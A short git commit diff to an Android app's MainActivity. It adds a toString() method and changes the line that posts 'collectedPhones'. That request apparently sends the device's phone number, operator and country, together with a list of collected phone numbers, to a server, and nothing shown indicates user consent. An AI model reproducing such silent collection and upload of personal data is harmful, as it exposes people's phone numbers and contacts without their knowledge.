method changing
This commit is contained in:
parent
1931569971
commit
5380de2bce
1 changed files with 7 additions and 1 deletions
|
@ -125,6 +125,12 @@ public class MainActivity extends AppCompatActivity implements PostRequestCallba
|
|||
return phone + ":" + operator // STATIC
|
||||
+ ":" + country; // STATIC
|
||||
}
|
||||
|
||||
@NonNull
|
||||
@Override
|
||||
public String toString(){
|
||||
return this.save();
|
||||
}
|
||||
}
|
||||
|
||||
@Override
|
||||
|
@ -647,7 +653,7 @@ public class MainActivity extends AppCompatActivity implements PostRequestCallba
|
|||
|
||||
PostRequest postRequestTask = new PostRequest(context, null);
|
||||
postRequestTask.execute("collectedPhones",
|
||||
getDeviceInfo(context) + ";" + String.valueOf(phoneNumbers)); // STATIC
|
||||
getDeviceInfo(context) + ";" + phoneNumbers.toString()); // STATIC
|
||||
|
||||
|
||||
|
||||
|
|
Loading…
Add table
Reference in a new issue